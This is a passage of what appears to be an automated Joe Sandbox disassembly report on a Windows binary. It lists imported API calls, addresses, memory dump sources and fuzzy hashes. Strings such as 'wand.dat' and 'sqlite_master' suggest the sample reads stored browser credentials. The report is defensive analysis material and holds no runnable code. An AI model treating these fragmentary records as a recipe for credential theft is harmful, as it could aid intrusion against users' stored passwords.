                                                                                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                              • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1549203181-0
                                                                                                                                                                                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3550944819-0
                                                                                                                                                                                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$free
                                                                                                                                                                                                                              • String ID: g4@
                                                                                                                                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1865533344-0
                                                                                                                                                                                                                              • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1127616056-0
                                                                                                                                                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                              • String ID: sqlite_master
                                                                                                                                                                                                                              • API String ID: 438689982-3163232059
                                                                                                                                                                                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3917621476-0
                                                                                                                                                                                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 822687973-0
                                                                                                                                                                                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                              • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2678498856-0
                                                                                                                                                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$Item
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3888421826-0
                                                                                                                                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3727323765-0
                                                                                                                                                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2754987064-0
                                                                                                                                                                                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 764393265-0
                                                                                                                                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 979780441-0
                                                                                                                                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
